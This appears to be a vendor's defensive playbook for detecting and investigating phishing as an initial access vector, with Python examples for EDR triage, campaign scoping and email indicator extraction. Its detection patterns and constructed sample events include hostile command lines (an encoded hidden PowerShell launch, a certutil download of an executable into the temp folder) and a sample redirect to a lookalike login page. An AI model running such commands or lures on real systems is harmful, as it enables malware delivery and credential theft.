Phishing Initial Access

Detect and investigate phishing as an initial access vector in enterprise environments.

Last updated: February 2026

Purpose and Scope

Phishing remains one of the most common initial access techniques, because it targets people rather than patched software. This playbook covers detecting phishing delivery, analyzing the delivered payload or link, and investigating compromises that begin with a malicious email or message.

Prerequisites

  • Email telemetry: Mail gateway logs, Microsoft 365 message trace, Google Workspace email logs
  • Endpoint telemetry: EDR with process creation, file writes, and network connections
  • SIEM integration: Email and endpoint logs correlated in your analysis platform
  • Threat intelligence: Access to IOC feeds and URL/file reputation services

Detection Goals

Identify and respond to:

  • Malicious email delivery bypassing gateway filters
  • User interaction with phishing links or attachments
  • Credential theft on fake login pages
  • Payload execution following phishing
  • Lateral movement after initial compromise

Key Data Sources

Email Gateway and Provider Logs

  • Microsoft 365: Message trace, Safe Links, Safe Attachments verdicts
  • Google Workspace: Gmail logs in BigQuery or SIEM export
  • Secure email gateways: Proofpoint, Mimecast, Barracuda logs

Key fields: sender, recipient, subject, URLs in body, attachment names, attachment hashes, delivery action, verdict.

Endpoint Telemetry

Correlate email events with endpoint activity on the recipient's host:

  • Outlook, Office applications or browsers spawning script interpreters and other living-off-the-land binaries (PowerShell, cmd, wscript, mshta, rundll32)
  • File writes from email attachments, including executables unpacked from archives or mounted ISO/IMG images
  • Network connections initiated shortly after the email arrived or the attachment was opened
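The detection logic behind the first two bullets, as an added example (not code from this page or from any EDR vendor): a mail client, Office application or browser spawning a loader, encoded or download-cradle PowerShell, and an executable started from an attachment staging folder or from a newly mounted volume. The event fields are assumptions modelled on generic EDR process-creation telemetry, the sample events are constructed, and the non-system-volume check assumes C: is the only fixed drive.

```python
"""Added example for this playbook, not the page's own code: flag process
creations that fit the 'mail client or Office app spawns a loader' pattern.
Event fields are assumptions modelled on generic EDR telemetry; the sample
events below are constructed."""
import ntpath
import re
from dataclasses import dataclass

# Parents that render untrusted email content (image names, lower-case).
CONTENT_HANDLERS = {
    "outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe",
    "msedge.exe", "chrome.exe", "firefox.exe",
}
# Children commonly used as a first-stage loader.
LOADERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe",
    "bitsadmin.exe", "curl.exe",
}
# PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
ENCODED_FLAGS = {"-encodedcommand"[:n] for n in range(2, 16)} | {"-ec"}
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|frombase64string|net\.webclient|start-bitstransfer")
# Folders an attachment lands in when the user opens or saves it.
STAGING_DIRS = ("\\content.outlook\\", "\\downloads\\", "\\appdata\\local\\temp\\")


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def reasons(ev: ProcessEvent) -> list[str]:
    """Why an event is suspicious; an empty list means no finding."""
    parent, child = image_name(ev.parent_image), image_name(ev.image)
    cmd, image = ev.command_line.lower(), ev.image.lower()
    out = []
    if parent in CONTENT_HANDLERS and child in LOADERS:
        out.append(f"{parent} spawned {child}")
    if child in ("powershell.exe", "pwsh.exe"):
        if any(tok in ENCODED_FLAGS for tok in cmd.split()):
            out.append("encoded PowerShell command")
        if DOWNLOAD_CRADLE.search(cmd):
            out.append("PowerShell download/execute cradle")
    if any(d in image for d in STAGING_DIRS):
        out.append("executable run from attachment staging folder")
    # Heuristic: a mounted ISO/IMG shows up as a new drive letter, so a binary
    # launched from a volume other than C: deserves a look. Assumption: C: is
    # the system drive and workstations have no other fixed volumes.
    if re.match(r"^[d-z]:\\", image) and parent in CONTENT_HANDLERS | {"explorer.exe"}:
        out.append(f"executable launched from non-system volume {image[:2]}")
    return out


def triage(events):
    """[(event, reasons)] for every event that has at least one reason."""
    return [(ev, why) for ev in events if (why := reasons(ev))]


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "alice", r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("ws02", "bob", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 r'cmd /c "certutil -urlcache -f http://198.51.100.9/a.exe %TEMP%\a.exe"'),
    ProcessEvent("ws03", "carol", r"C:\Windows\explorer.exe", r"D:\Invoice_2026.exe", "Invoice_2026.exe"),
    ProcessEvent("ws04", "dave", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for ev, why in triage(SAMPLE_EVENTS):
        print(f"{ev.host} {ev.user}: {image_name(ev.parent_image)} -> {image_name(ev.image)}: {'; '.join(why)}")
```

Each reason is a separate string so an alert can carry all of them; in practice the parent/child rule alone is noisy for browsers (installers legitimately spawn msiexec), so weight it by the other findings before paging anyone.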

Investigation Workflow

1. Identify the Phishing Email

  • Locate the email in gateway logs using sender, subject, attachment hash or Message-ID
  • Identify all recipients who received the same message, including variants with a different sender address or subject
  • Check the delivery action: was it quarantined, delivered to junk, delivered to the inbox, or delivered and later removed?
  • Extract indicators: sender domain, envelope sender (Return-Path), Reply-To address, URLs (including the destination behind redirector and tracking links), attachment names and hashes

2. Analyze Indicators

  • Check URLs against VirusTotal, urlscan.io, and internal blocklists; unwrap redirector and tracking links to the final destination first, since the outer host is often a legitimate service
  • Submit attachments to sandbox analysis
  • Look up sender domain age and reputation and the SPF/DKIM/DMARC results in the Authentication-Results header. A passing SPF only vouches for the envelope sender domain; the DMARC verdict tells you whether the visible From domain is aligned with what was authenticated
  • Check if the sender domain is a typosquat of a known brand (swapped characters, homoglyphs such as 0 for o or rn for m, added words like "login" or "support")

3. Determine User Interaction

For each recipient, determine if they:

  • Opened the email (if read tracking is available)
  • Clicked links (Safe Links logs, web proxy, endpoint browser history)
  • Opened attachments (endpoint file access logs)
  • Entered credentials (look for sign-ins from new locations or devices, unexpected MFA prompts, and failed sign-ins that got the password right)
  • Executed payloads (endpoint process creation)

4. Check for Post-Compromise Activity

If users interacted with the phishing content:

  • Review authentication logs for the affected accounts: new locations, new devices, impossible-travel patterns
  • Look for mailbox rule changes (forwarding, deletion or move-to-folder rules, often with inconspicuous names such as a single character)
  • Check for OAuth application consent grants and for newly registered MFA methods or devices
  • Examine the endpoint for persistence mechanisms
  • Search for lateral movement to other systems

5. Scope the Incident

  • How many users received the email?
  • How many interacted with it?
  • How many show signs of compromise?
  • Are other systems affected?
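Steps 1 to 5 carried through in code, as an added example that is not part of the original page: find every delivery from the campaign (including a second sender domain that reused the same lure), decide per recipient whether they clicked, whether a successful sign-in from a country outside their pre-incident baseline followed within a day, and whether a mailbox rule appeared afterwards, then roll that up into scope counts and two action lists. The log records are constructed and their field names are assumptions modelled on a message trace, a Safe Links click report, a sign-in log and a mailbox-rule audit export; map them onto your SIEM's schema.

```python
"""Added example for this playbook, not the page's own code: steps 1 to 5 of
the workflow run over constructed telemetry. Record shapes are assumptions
modelled on a message trace, a Safe Links click report, a sign-in log and a
mailbox-rule audit export."""
from datetime import datetime, timedelta

T = datetime.fromisoformat

# Constructed sample logs, not real data. One gateway row per recipient.
SUBJECT = "Action required: your mailbox is full"
GATEWAY = [
    {"recipient": "alice@example.com", "sender": "helpdesk@micros0ft-login.com", "subject": SUBJECT,
     "time": T("2026-02-03T08:02:00"), "action": "Delivered"},
    {"recipient": "bob@example.com", "sender": "helpdesk@micros0ft-login.com", "subject": SUBJECT,
     "time": T("2026-02-03T08:02:00"), "action": "Delivered"},
    {"recipient": "carol@example.com", "sender": "helpdesk@micros0ft-login.com", "subject": SUBJECT,
     "time": T("2026-02-03T08:02:01"), "action": "Quarantined"},
    {"recipient": "dave@example.com", "sender": "billing@micr0soft-support.net", "subject": SUBJECT,
     "time": T("2026-02-03T08:03:00"), "action": "Delivered"},  # same lure, second sender domain
    {"recipient": "erin@example.com", "sender": "news@vendor.example", "subject": "March newsletter",
     "time": T("2026-02-03T08:05:00"), "action": "Delivered"},  # unrelated mail
]
CLICKS = [  # Safe Links / web proxy: who followed the link, and when
    {"user": "alice@example.com", "url": "https://micros0ft-login.com/owa", "time": T("2026-02-03T08:10:00")},
    {"user": "bob@example.com", "url": "https://micros0ft-login.com/owa", "time": T("2026-02-03T08:11:00")},
]
SIGNINS = [  # identity provider sign-in log
    {"user": "alice@example.com", "time": T("2026-02-02T09:00:00"), "country": "US", "result": "Success"},
    {"user": "alice@example.com", "time": T("2026-02-03T08:14:00"), "country": "NL", "result": "Success"},
    {"user": "bob@example.com", "time": T("2026-02-02T09:05:00"), "country": "US", "result": "Success"},
    {"user": "bob@example.com", "time": T("2026-02-03T08:15:00"), "country": "NL", "result": "Failure"},  # MFA held
]
MAILBOX_RULES = [  # audit log: inbox rules created
    {"user": "alice@example.com", "time": T("2026-02-03T08:20:00"), "name": ".", "actions": ["DeleteMessage"]},
]
SIMULATION_DOMAINS = {"phishtest.example"}  # internal simulation senders (assumption)


def campaign_rows(sender_domains, subject):
    """Step 1: every delivery from the campaign, matched on sender domain or
    identical subject. Internal simulations are dropped, not escalated."""
    rows = [r for r in GATEWAY
            if r["sender"].split("@")[-1] in sender_domains or r["subject"] == subject]
    return [r for r in rows if r["sender"].split("@")[-1] not in SIMULATION_DOMAINS]


def user_status(row, window=timedelta(hours=24)):
    """Steps 3 and 4 for one recipient: interaction, then compromise signals."""
    user, delivered = row["recipient"], row["time"]
    status = {"user": user, "delivered": row["action"] == "Delivered",
              "clicked": None, "anomalous_signin": None, "mailbox_rule": None}
    if not status["delivered"]:
        return status
    clicks = sorted(c["time"] for c in CLICKS if c["user"] == user and c["time"] >= delivered)
    if clicks:
        status["clicked"] = clicks[0]
        # Baseline: countries this user signed in from before the mail arrived.
        # A successful sign-in from anywhere else within the window after the
        # click is the strongest sign the entered credentials were used.
        baseline = {s["country"] for s in SIGNINS
                    if s["user"] == user and s["result"] == "Success" and s["time"] < delivered}
        status["anomalous_signin"] = next(
            (s for s in SIGNINS if s["user"] == user and s["result"] == "Success"
             and clicks[0] <= s["time"] <= clicks[0] + window and s["country"] not in baseline), None)
    status["mailbox_rule"] = next(
        (m for m in MAILBOX_RULES if m["user"] == user and m["time"] >= delivered), None)
    return status


def scope(sender_domains, subject):
    """Step 5: roll per-user results into counts and two action lists."""
    statuses = [user_status(r) for r in campaign_rows(sender_domains, subject)]
    compromised = [s for s in statuses if s["anomalous_signin"] or s["mailbox_rule"]]
    return {
        "recipients": len(statuses),
        "delivered": sum(s["delivered"] for s in statuses),
        "clicked": sum(s["clicked"] is not None for s in statuses),
        "compromised": len(compromised),
        "reset_and_revoke": sorted(s["user"] for s in compromised),
        "notify_unclicked": sorted(s["user"] for s in statuses if s["delivered"] and s["clicked"] is None),
    }


if __name__ == "__main__":
    print(scope({"micros0ft-login.com"}, SUBJECT))
```

Bob clicked but his only post-click sign-in attempt failed, so he lands in the clicked count and not the compromised one; whether that is good enough to skip a credential reset is a policy call, and many teams reset every clicker anyway. Dave never clicked and gets a warning rather than a reset.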

Common Phishing Patterns

Credential Phishing

Fake login pages for Microsoft 365, Google, banking, or internal applications. Look for:

  • Links to lookalike domains
  • Redirects through legitimate services (Google Docs, Azure Blob)
  • QR codes leading to phishing pages

Attachment Based Payloads

  • Office documents with macros
  • HTML attachments with embedded JavaScript (HTML smuggling: the page assembles and drops the payload in the browser, so the gateway never sees it as a file)
  • ISO/IMG files containing executables or shortcuts, historically favoured because mark-of-the-web did not propagate to files inside the mounted image
  • Password protected archives, with the password in the email body so the gateway cannot inspect the contents
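The indicator extraction from step 2 of the workflow, applied to the credential-phishing patterns above (lookalike domain, redirect through a legitimate-looking host, HTML attachment), as an added example that is not the page's own code. It parses a message with the Python standard library, reads the SPF/DKIM/DMARC verdicts from the Authentication-Results header, compares the From and Reply-To domains, unwraps a percent-encoded URL hidden inside a redirector link, hashes the attachment, and runs a homoglyph-aware typosquat check against a brand list. The message, the brand list and the redirector host are constructed; the typosquat heuristic assumes the registrable domain is the last two labels, which a production version should replace with a Public Suffix List lookup.

```python
"""Added example for this playbook, not the page's own code: pull the step 1
and step 2 indicators out of a raw message using only the standard library.
The message, brand list and redirector host are constructed; the typosquat
check is a heuristic, not a substitute for a reputation or WHOIS lookup."""
import hashlib
import re
from email import message_from_bytes, policy
from urllib.parse import unquote, urlparse

BRANDS = ("microsoft.com", "office.com", "google.com", "paypal.com")  # assumption
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

RAW_EMAIL = b"""Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=micros0ft-login.com;
 dkim=none; dmarc=fail header.from=microsoft.com
From: "Microsoft 365" <no-reply@microsoft.com>
Reply-To: helpdesk@micros0ft-login.com
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<a href="https://storage.example-blob.net/r?u=https%3A%2F%2Fmicros0ft-login.com%2Fowa">Free up space</a>
--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="Invoice.html"

<script>location="https://micros0ft-login.com/owa"</script>
--b1--
"""  # constructed sample, not a real campaign


def parse_auth_results(msg):
    """spf/dkim/dmarc verdicts recorded by the receiving MX."""
    hdr = str(msg.get("Authentication-Results", ""))
    return {m.group(1).lower(): m.group(2).lower()
            for m in re.finditer(r"\b(spf|dkim|dmarc)=(\w+)", hdr, re.I)}

def addr_domain(value):
    """Lower-case domain of the first address in a header value ('' if none)."""
    m = re.search(r"@([\w.-]+)", str(value or ""))
    return m.group(1).lower() if m else ""

def expand_nested(url):
    """The URL plus any URL wrapped inside it (redirectors, tracking links)."""
    chain = []
    while url and url not in chain:
        chain.append(url)
        m = URL_RE.search(unquote(url), len("https://"))  # skip the outer scheme
        url = m.group(0) if m else None
    return chain

def extract_urls(msg):
    """Every URL in every text part, body and text attachments alike, unwrapped."""
    urls = set()
    for part in msg.walk():
        if part.get_content_maintype() == "text":
            for u in URL_RE.findall(part.get_content()):
                urls.update(expand_nested(u))
    return sorted(urls)

def attachments(msg):
    """(filename, sha256) per attachment; the hash is what you pivot on in gateway logs."""
    return [(p.get_filename(), hashlib.sha256(p.get_payload(decode=True) or b"").hexdigest())
            for p in msg.iter_attachments()]

def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def typosquat_of(domain, brands=BRANDS):
    """Brand the domain appears to imitate, or None. Registrable domain is taken as
    the last two labels (assumption: use the Public Suffix List in production)."""
    reg = ".".join(domain.lower().split(".")[-2:])
    if not reg or reg in brands:
        return None
    name = reg.split(".")[0].translate(HOMOGLYPHS).replace("rn", "m")
    for brand in brands:
        bname = brand.split(".")[0]
        if bname in name or levenshtein(name, bname) <= 2:
            return brand
    return None

def triage(raw):
    """Indicators and first findings for one message."""
    msg = message_from_bytes(raw, policy=policy.default)
    from_dom, reply_dom = addr_domain(msg["From"]), addr_domain(msg["Reply-To"])
    urls, auth, findings = extract_urls(msg), parse_auth_results(msg), []
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    if auth.get("dmarc") == "fail":
        findings.append("DMARC failed: From domain not aligned with the authenticated sender")
    hosts = {from_dom, reply_dom} | {urlparse(u).hostname or "" for u in urls}
    squats = {h: typosquat_of(h) for h in hosts if h}
    findings += [f"{h} resembles {b}" for h, b in sorted(squats.items()) if b]
    return {"from_domain": from_dom, "reply_to_domain": reply_dom, "auth": auth,
            "urls": urls, "attachments": attachments(msg), "findings": findings}
```

The message passes SPF, because the attacker controls the envelope domain, and still fails DMARC, because the displayed From domain is not the one that was authenticated; that split is the single most useful thing to read off the header. The attachment is walked as a text part too, which is how the hard-coded redirect inside the HTML file surfaces without opening it.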

Business Email Compromise (BEC)

No malware, but social engineering to redirect payments or steal data:

  • Impersonation of executives or vendors
  • Requests to change payment details
  • Urgency and secrecy themes

Response Actions

  • Quarantine: Remove the email from all recipient mailboxes, including the variants found while scoping
  • Block indicators: Add sender, URLs, and hashes to blocklists
  • Reset credentials: For users who entered credentials on phishing pages
  • Revoke sessions: Force reauthentication for compromised accounts, and do it together with the reset. Adversary-in-the-middle phishing kits relay the login and capture the resulting session cookie, so the attacker keeps access until tokens are revoked, even after the password changes
  • Notify users: Alert recipients who did not interact yet
  • Hunt for related activity: Search for other emails from the same campaign (same sending infrastructure, subject pattern, or landing page)

Tuning and False Positives

  • Legitimate marketing emails may trigger link click alerts
  • Internal phishing simulations should be excluded from escalation
  • Automated email forwarding can make attribution difficult: the account that clicked may not be the original recipient
  • Build allowlists for known safe senders and domains, and review them periodically, since a compromised trusted partner passes straight through them



Built by RedPhish LLC. All Rights Reserved. Copyright 2025.
